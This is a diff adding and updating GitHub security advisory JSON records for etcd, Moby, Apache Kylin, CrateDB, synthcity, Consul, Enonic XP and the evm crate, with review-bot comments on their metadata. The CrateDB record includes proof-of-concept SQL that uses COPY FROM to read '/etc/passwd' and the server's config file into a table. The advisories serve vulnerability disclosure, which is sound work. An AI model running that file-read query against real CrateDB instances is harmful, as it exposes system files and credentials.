"https://github.com/vantage6/vantage6/commit/3fcc6e6a8bd1142fd7a558d8fdd2b246e55c8841" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vantage6/vantage6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:56:46Z", + "nvd_published_at": "2024-01-30T16:15:47Z" + } +} \ No newline at end of file 
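Review bot: The Workarounds section covers only rebuilding the image; for operators who cannot rebuild, the mitigation the Impact text itself relies on, not exposing the container's SSH service, should be stated explicitly, e.g. `Do not publish the node or server container's SSH port (presumably 22) and, if it must be reachable, set PermitRootLogin no and PasswordAuthentication no in the image's sshd_config.` CWE-284 is a broad parent; the defect described, a shipped default that permits root password login, maps more precisely to CWE-1188 (Insecure Default Initialization of Resource) or CWE-276. The C:L/I:L impact looks low for root SSH with password authentication; if the score assumes the port is not exposed by default, the details should say so, since readers will otherwise read MODERATE as the worst case.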
diff --git a/advisories/github-reviewed/2024/01/GHSA-2xhq-gv6c-p224/GHSA-2xhq-gv6c-p224.json b/advisories/github-reviewed/2024/01/GHSA-2xhq-gv6c-p224/GHSA-2xhq-gv6c-p224.json
new file mode 100644
index 0000000000000..1d314bef27e39
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-2xhq-gv6c-p224/GHSA-2xhq-gv6c-p224.json
@@ -0,0 +1,84 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2xhq-gv6c-p224", + "modified": "2024-01-31T00:21:52Z", + "published": "2024-01-31T00:21:52Z", + "aliases": [ + "CVE-2020-15114" + ], + "summary": "Etcd Gateway can include itself as an endpoint resulting in resource exhaustion", + "details": "### Vulnerability type\nDenial of Service\n\n### Detail\nThe etcd gateway is a simple TCP proxy to allow for basic service discovery and access. However, it is possible to include the gateway address as an endpoint. This results in a denial of service, since the endpoint can become stuck in a loop of requesting itself until there are no more available file descriptors to accept connections on the gateway.\n\n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0-rc.0" + }, + { + "fixed": "3.4.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.4.9" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.3.23" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-2xhq-gv6c-p224" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15114" + }, + { + "type": "WEB", + "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400", + "CWE-772" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T00:21:52Z", + "nvd_published_at": "2020-08-06T23:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-3f63-hfp8-52jq/GHSA-3f63-hfp8-52jq.json b/advisories/github-reviewed/2024/01/GHSA-3f63-hfp8-52jq/GHSA-3f63-hfp8-52jq.json index 161d348457f91..465b07e1971db 100644 --- a/advisories/github-reviewed/2024/01/GHSA-3f63-hfp8-52jq/GHSA-3f63-hfp8-52jq.json +++ b/advisories/github-reviewed/2024/01/GHSA-3f63-hfp8-52jq/GHSA-3f63-hfp8-52jq.json @@ -65,6 +65,10 @@ "type": "WEB", "url": "https://github.com/python-pillow/Pillow/releases" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00019.html" + }, { "type": "WEB", "url": "https://pillow.readthedocs.io/en/stable/releasenotes/10.2.0.html#security" diff --git a/advisories/github-reviewed/2024/01/GHSA-3fwx-pjgw-3558/GHSA-3fwx-pjgw-3558.json b/advisories/github-reviewed/2024/01/GHSA-3fwx-pjgw-3558/GHSA-3fwx-pjgw-3558.json new file mode 100644 index 0000000000000..dd06201b8d38c --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-3fwx-pjgw-3558/GHSA-3fwx-pjgw-3558.json 
@@ -0,0 +1,74 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3fwx-pjgw-3558", + "modified": "2024-01-31T23:28:58Z", + "published": "2024-01-31T23:28:58Z", + "aliases": [ + "CVE-2021-41091" + ], + "summary": "Moby (Docker Engine) Insufficiently restricted permissions on data directory", + "details": "## Impact\n\nA bug was found in Moby (Docker Engine) where the data directory (typically `/var/lib/docker`) contained subdirectories with insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as `setuid`), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files.\n\n## Patches\n\nThis bug has been fixed in Moby (Docker Engine) 20.10.9. Users should update to this version as soon as possible. Running containers should be stopped and restarted for the permissions to be fixed.\n\n## Workarounds\n\nLimit access to the host to trusted users. 
Limit access to host volumes to trusted containers.\n\n## Credits\n\nThe Moby project would like to thank Joan Bruguera for responsibly disclosing this issue in accordance with the [Moby security policy](https://github.com/moby/moby/blob/master/SECURITY.md).\n\n## For more information\n\nIf you have any questions or comments about this advisory:\n\n* [Open an issue](https://github.com/moby/moby/issues/new)\n* Email us at security@docker.com if you think you’ve found a security bug", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "20.10.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/moby/security/advisories/GHSA-3fwx-pjgw-3558" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41091" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/f0ab919f518c47240ea0e72d0999576bb8008e64" + }, + { + "type": "WEB", + "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B5Q6G6I4W5COQE25QMC7FJY3I3PAYFBB/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNFADTCHHYWVM6W4NJ6CB4FNFM2VMBIB/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-281", + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:28:58Z", + "nvd_published_at": "2021-10-04T21:15:00Z" + } +} \ No newline at end of file 
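Review bot: The affected package is listed as `github.com/moby/moby`, but the engine's Go module path, the name that appears in a dependent's go.mod, is as far as I know `github.com/docker/docker`, so consumers vendoring the engine under that path would not be matched by this range; if that is right, add a second `affected` entry for `github.com/docker/docker` with the same `"fixed": "20.10.9"` bound. The Patches text notes that running containers must be stopped and restarted for the permission fix to apply; that step is easy to miss after a package upgrade and is worth repeating in the Workarounds list, e.g. `After upgrading, restart all running containers so the data-directory permissions are corrected.` The CWE pairing (CWE-281, CWE-732) matches the described defect.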
diff --git a/advisories/github-reviewed/2024/01/GHSA-3vvc-v8c2-43r7/GHSA-3vvc-v8c2-43r7.json b/advisories/github-reviewed/2024/01/GHSA-3vvc-v8c2-43r7/GHSA-3vvc-v8c2-43r7.json
new file mode 100644
index 0000000000000..484a38020a4e5
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-3vvc-v8c2-43r7/GHSA-3vvc-v8c2-43r7.json
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3vvc-v8c2-43r7", + "modified": "2024-02-02T15:59:47Z", + "published": "2024-01-29T15:30:25Z", + "aliases": [ + "CVE-2023-29055" + ], + "summary": "Apache Kylin has Insufficiently Protected Credentials", + "details": "In Apache Kylin version 2.0.0 to 4.0.3, there is a Server Config web interface that displays the content of file 'kylin.properties', that may contain serverside credentials. When the kylin service runs over HTTP (or other plain text protocol), it is possible for network sniffers to hijack the HTTP payload and get access to the content of kylin.properties and potentially the containing credentials.\n\nTo avoid this threat, users are recommended to \n\n * Always turn on HTTPS so that network payload is encrypted.\n\n * Avoid putting credentials in kylin.properties, or at least not in plain text.\n * Use network firewalls to protect the serverside such that it is not accessible to external attackers.\n\n * Upgrade to version Apache Kylin 4.0.4, which filters out the sensitive content that goes to the Server Config web interface.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.kylin:kylin-core-common" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "4.0.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29055" + }, + { + "type": "WEB", + "url": "https://github.com/apache/kylin/commit/b60d5ae694dffc2281bfe0ef464eada0b3a9b774" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/kylin" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/o1bvyv9wnfkx7dxpfjlor20nykgsoh6r" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/29/1" + } + ], + "database_specific": { + 
"cwe_ids": [ + "CWE-522" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:29:38Z", + "nvd_published_at": "2024-01-29T13:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-44cc-43rp-5947/GHSA-44cc-43rp-5947.json b/advisories/github-reviewed/2024/01/GHSA-44cc-43rp-5947/GHSA-44cc-43rp-5947.json index 0858911efe95f..befc3f6440e1e 100644 --- a/advisories/github-reviewed/2024/01/GHSA-44cc-43rp-5947/GHSA-44cc-43rp-5947.json +++ b/advisories/github-reviewed/2024/01/GHSA-44cc-43rp-5947/GHSA-44cc-43rp-5947.json @@ -106,6 +106,10 @@ { "type": "PACKAGE", "url": "https://github.com/jupyterlab/jupyterlab" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQJKNRDRFMKGVRIYNNN6CKMNJDNYWO2H/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2024/01/GHSA-45gq-q4xh-cp53/GHSA-45gq-q4xh-cp53.json b/advisories/github-reviewed/2024/01/GHSA-45gq-q4xh-cp53/GHSA-45gq-q4xh-cp53.json new file mode 100644 index 0000000000000..f13c8e9ae5015 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-45gq-q4xh-cp53/GHSA-45gq-q4xh-cp53.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-45gq-q4xh-cp53", + "modified": "2024-01-30T20:56:48Z", + "published": "2024-01-30T20:56:48Z", + "aliases": [ + "CVE-2024-21671" + ], + "summary": "vantage6 vulnerable to username timing attack", + "details": "### Impact\nIt is possible to find out usernames from the response time of login requests. This could aid attackers in credential attacks\n\n### Workarounds\nNo\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vantage6-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vantage6/vantage6/security/advisories/GHSA-45gq-q4xh-cp53" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21671" + }, + { + "type": "WEB", + "url": "https://github.com/vantage6/vantage6/commit/389f416c445da4f2438c72f34c3b1084485c4e30" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vantage6/vantage6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-208" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:56:48Z", + "nvd_published_at": "2024-01-30T16:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-475g-vj6c-xf96/GHSA-475g-vj6c-xf96.json b/advisories/github-reviewed/2024/01/GHSA-475g-vj6c-xf96/GHSA-475g-vj6c-xf96.json new file mode 100644 index 0000000000000..2a52003bcab7c --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-475g-vj6c-xf96/GHSA-475g-vj6c-xf96.json 
@@ -0,0 +1,141 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-475g-vj6c-xf96", + "modified": "2024-01-30T20:57:16Z", + "published": "2024-01-30T20:57:16Z", + "aliases": [ + "CVE-2024-24565" + ], + "summary": "CrateDB database has an arbitrary file read vulnerability", + "details": "### Summary\nThere is an arbitrary file read vulnerability in the CrateDB database, and authenticated CrateDB database users can read any file on the system.\n\n### Details\nThere is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.\n\n### PoC\n```\nCREATE TABLE info_leak(info_leak STRING);\nCOPY info_leak FROM '/etc/passwd' with (format='csv', header=false); or COPY info_leak FROM '/crate/config/crate.yml' with (format='csv', header=false);\nSELECT * FROM info_leak;\n```\n![image](https://user-images.githubusercontent.com/154296962/292985975-ff5f2fb8-1a3f-4b49-9951-cd1fc6e78031.png)\n\n\n### Impact\nThis vulnerability affects all current versions of the CrateDB database. 
Attackers who exploit this vulnerability to obtain sensitive information may carry out further attacks, while also affecting CrateDB Cloud Clusters.\n![image](https://user-images.githubusercontent.com/154296962/292986215-aec5adfe-38cc-4f31-bf86-c50ecbb44d5d.png)\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.3.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.4.0" + }, + { + "fixed": "5.4.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.5.0" + }, + { + "fixed": "5.5.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.6.0" + }, + { + "fixed": "5.6.1" + } + ] + } + ], + "versions": [ + "5.6.0" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/crate/crate/security/advisories/GHSA-475g-vj6c-xf96" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24565" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/32d0fc2ebb834ea324eb7ab5d01320a67bc5c3c7" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/4e857d675683095945dd524d6ba03e692c70ecd6" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/b75aeeabf90f51bd96ddb499903928fd10185207" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/c4c97d5a1c52cc2250ea42d062a3d37550c19dd5" + }, + { + "type": "WEB", + "url": 
"https://github.com/crate/crate/commit/c5034323f1b56ca5d04b8ef4c6029eb63a5ba172" + }, + { + "type": "PACKAGE", + "url": "https://github.com/crate/crate" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:57:16Z", + "nvd_published_at": "2024-01-30T17:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-4957-7vhp-7v59/GHSA-4957-7vhp-7v59.json b/advisories/github-reviewed/2024/01/GHSA-4957-7vhp-7v59/GHSA-4957-7vhp-7v59.json new file mode 100644 index 0000000000000..6dc688b580a28 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-4957-7vhp-7v59/GHSA-4957-7vhp-7v59.json 
@@ -0,0 +1,78 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4957-7vhp-7v59", + "modified": "2024-02-02T20:31:47Z", + "published": "2024-01-26T18:30:34Z", + "aliases": [ + "CVE-2024-0937" + ], + "summary": "Deserialization of untrusted data in synthcity", + "details": "A vulnerability, which was classified as critical, has been found in van_der_Schaar LAB synthcity 0.2.9. Affected by this issue is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252182 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "synthcity" + }, + "ecosystem_specific": { + "affected_functions": [ + "synthcity.utils.serialization.load_from_file" + ] + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.2.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0937" + }, + { + "type": "WEB", + "url": "https://github.com/bayuncao/vul-cve-6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vanderschaarlab/synthcity" + }, + { + "type": "WEB", + "url": "https://github.com/vanderschaarlab/synthcity/blob/73cfd8ca784f70141fc7f2969221cd3b5737f7b1/src/synthcity/utils/serialization.py#L30" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252182" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252182" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T20:31:47Z", + 
"nvd_published_at": "2024-01-26T18:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-496g-fr33-whrf/GHSA-496g-fr33-whrf.json b/advisories/github-reviewed/2024/01/GHSA-496g-fr33-whrf/GHSA-496g-fr33-whrf.json new file mode 100644 index 0000000000000..7dfed4fcffd76 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-496g-fr33-whrf/GHSA-496g-fr33-whrf.json 
@@ -0,0 +1,93 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-496g-fr33-whrf", + "modified": "2024-01-31T23:11:24Z", + "published": "2024-01-31T23:11:24Z", + "aliases": [ + "CVE-2020-25201" + ], + "summary": "Denial of service in HashiCorp Consul", + "details": "HashiCorp Consul Enterprise versions 1.7.0 up to 1.7.8 and 1.8.0 up to 1.8.4 includes a namespace replication bug which can be triggered to cause denial of service via infinite Raft writes. Fixed in 1.7.9 and 1.8.5.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/consul" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.7.0" + }, + { + "fixed": "1.7.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/consul" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.8.0" + }, + { + "fixed": "1.8.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25201" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/consul/pull/9024" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/consul/blob/master/CHANGELOG.md#185-october-23-2020" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/consul/releases/tag/v1.8.5" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202208-09" + }, + { + "type": "WEB", + "url": "https://www.hashicorp.com/blog/category/consul" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400", + "CWE-834" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:11:24Z", + "nvd_published_at": "2020-11-04T23:15:11Z" + } +} \ No newline at end of file 
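Review bot: The affected package is the open-source module `github.com/hashicorp/consul`, yet the details attribute the bug to namespace replication and scope it to Consul Enterprise 1.7.0–1.7.8 and 1.8.0–1.8.4. As written, every OSS consumer of those versions is matched even if the replication path only runs under Enterprise; worth confirming against the linked PR #9024 whether the vulnerable code ships in the OSS module, and if it is Enterprise-only, saying so in the details so scanners do not over-report. The two range entries themselves agree with the fixed versions named in the details (1.7.9 and 1.8.5).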
diff --git a/advisories/unreviewed/2024/01/GHSA-4hrp-m3f2-643j/GHSA-4hrp-m3f2-643j.json b/advisories/github-reviewed/2024/01/GHSA-4hrp-m3f2-643j/GHSA-4hrp-m3f2-643j.json similarity index 75% rename from advisories/unreviewed/2024/01/GHSA-4hrp-m3f2-643j/GHSA-4hrp-m3f2-643j.json rename to advisories/github-reviewed/2024/01/GHSA-4hrp-m3f2-643j/GHSA-4hrp-m3f2-643j.json index db041990a1443..772426a709503 100644 --- a/advisories/unreviewed/2024/01/GHSA-4hrp-m3f2-643j/GHSA-4hrp-m3f2-643j.json +++ b/advisories/github-reviewed/2024/01/GHSA-4hrp-m3f2-643j/GHSA-4hrp-m3f2-643j.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-4hrp-m3f2-643j", - "modified": "2024-01-26T21:30:21Z", + "modified": "2024-01-29T22:30:31Z", "published": "2024-01-19T21:30:36Z", "aliases": [ "CVE-2024-23679" ], + "summary": "Session fixation in Enonic XP", "details": "Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. An remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes.\n\n", "severity": [ { @@ -14,7 +15,25 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "Maven", + "name": "com.enonic.xp:lib-auth" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.7.4" + } + ] + } + ] + } ], "references": [ { @@ -55,8 +74,8 @@ "CWE-384" ], "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:30:31Z", "nvd_published_at": "2024-01-19T21:15:10Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-4jwq-572w-4388/GHSA-4jwq-572w-4388.json b/advisories/github-reviewed/2024/01/GHSA-4jwq-572w-4388/GHSA-4jwq-572w-4388.json new file mode 100644 index 0000000000000..91ed7b53d6b87 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-4jwq-572w-4388/GHSA-4jwq-572w-4388.json 
@@ -0,0 +1,307 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4jwq-572w-4388", + "modified": "2024-01-30T23:55:38Z", + "published": "2024-01-30T23:55:38Z", + "aliases": [ + "CVE-2021-29511" + ], + "summary": "Memory over-allocation in evm crate", + "details": "### Impact\nPrior to the patch, when executing specific EVM opcodes related to memory operations that use `evm_core::Memory::copy_large`, the crate can over-allocate memory when it is not needed, making it possible for an attacker to perform denial-of-service attack.\n\n### Patches\nThe flaw was corrected in commit `19ade85`. Users should upgrade to `==0.21.1, ==0.23.1, ==0.24.1, ==0.25.1, >=0.26.1`.\n\n### Workarounds\nNone. Please upgrade your `evm` crate version\n\n### References\nFix commit: https://github.com/rust-blockchain/evm/commit/19ade858c430ab13eb562764a870ac9f8506f8dd\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [evm repo](https://github.com/rust-blockchain/evm)\n* Email [Wei](mailto:wei@that.world)\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "evm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.21.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.21.0" + } + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.21.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.21.0" + } + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.22.0" + }, + { + "fixed": "0.22.1" + } + ] + } + ], + "versions": [ + "0.22.0" + ] + }, + { + "package": { + 
"ecosystem": "crates.io", + "name": "evm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.23.0" + }, + { + "fixed": "0.23.1" + } + ] + } + ], + "versions": [ + "0.23.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.24.0" + }, + { + "fixed": "0.24.1" + } + ] + } + ], + "versions": [ + "0.24.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.25.0" + }, + { + "fixed": "0.25.1" + } + ] + } + ], + "versions": [ + "0.25.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.26.0" + }, + { + "fixed": "0.26.1" + } + ] + } + ], + "versions": [ + "0.26.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.22.0" + }, + { + "fixed": "0.22.1" + } + ] + } + ], + "versions": [ + "0.22.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.23.0" + }, + { + "fixed": "0.23.1" + } + ] + } + ], + "versions": [ + "0.23.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.24.0" + }, + { + "fixed": "0.24.1" + } + ] + } + ], + "versions": [ + "0.24.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.25.0" + }, + { + "fixed": "0.25.1" + } + ] + } + ], + "versions": [ + "0.25.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ 
+ { + "introduced": "0.26.0" + }, + { + "fixed": "0.26.1" + } + ] + } + ], + "versions": [ + "0.26.0" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/rust-blockchain/evm/security/advisories/GHSA-4jwq-572w-4388" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29511" + }, + { + "type": "WEB", + "url": "https://github.com/rust-blockchain/evm/commit/19ade858c430ab13eb562764a870ac9f8506f8dd" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770", + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:55:38Z", + "nvd_published_at": "2021-05-12T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-4m77-cmpx-vjc4/GHSA-4m77-cmpx-vjc4.json b/advisories/github-reviewed/2024/01/GHSA-4m77-cmpx-vjc4/GHSA-4m77-cmpx-vjc4.json index b839616da29b6..0631a27f212b1 100644 --- a/advisories/github-reviewed/2024/01/GHSA-4m77-cmpx-vjc4/GHSA-4m77-cmpx-vjc4.json +++ b/advisories/github-reviewed/2024/01/GHSA-4m77-cmpx-vjc4/GHSA-4m77-cmpx-vjc4.json @@ -80,6 +80,10 @@ { "type": "PACKAGE", "url": "https://github.com/jupyterlab/jupyterlab" 